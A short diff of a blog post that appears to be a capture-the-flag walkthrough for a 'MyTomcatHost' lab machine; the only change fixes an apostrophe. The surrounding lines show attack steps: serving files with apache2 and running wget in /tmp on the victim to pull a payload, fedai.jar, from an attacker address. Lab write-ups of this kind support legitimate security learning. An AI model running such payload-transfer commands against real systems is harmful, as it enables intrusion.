F3dai/f3dai.github.io/_posts/2020-05-03-MyTomcatHost.md

 <pre>service apache2 start</pre>

-Go to the temp directory on the victims machine and transfer the payload over.
+Go to the temp directory on the victim's machine and transfer the payload over.

 <pre>cd /tmp
 wget http://192.168.56.101/fedai.jar</pre>